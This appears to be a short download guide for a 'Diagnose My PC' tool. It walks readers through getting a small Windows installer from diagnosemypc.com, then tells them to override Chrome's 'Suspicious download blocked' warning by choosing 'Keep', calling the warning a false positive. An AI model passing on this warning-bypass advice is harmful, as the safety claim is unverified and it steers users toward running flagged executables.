Open your browser and go to diagnosemypc.com. Type or paste a short description of the issue you’re experiencing into the text box on the homepage.
Click "Diagnose My PC Free"
Press the main call-to-action button to begin the download.

Your browser will download DiagnoseMyPc-Setup-v1.4.0.exe. It’s only about 430 KB — smaller than most photos.
If your browser shows a warning
Most downloads now complete without any prompt. Occasionally Chrome still shows a “Suspicious download blocked” message — this is a false positive on a signed installer. Click the › arrow next to the warning (or press Ctrl + J to open Downloads) and choose "Keep".
